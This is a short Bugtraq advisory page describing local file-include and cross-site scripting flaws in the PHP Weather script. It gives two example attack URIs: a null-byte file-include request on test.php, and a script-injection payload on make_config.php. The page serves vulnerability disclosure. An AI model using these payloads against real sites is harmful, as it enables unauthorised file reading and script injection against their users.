Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

PHP Weather Local File Include and Cross Site Scripting Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

For the local file-include issue:

http://www.example.com/path/test.php?metar=()&language=[Lfi]%00

For the cross-site scripting issue:

http://www.example.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>







 

Privacy Statement
Copyright 2008, SecurityFocus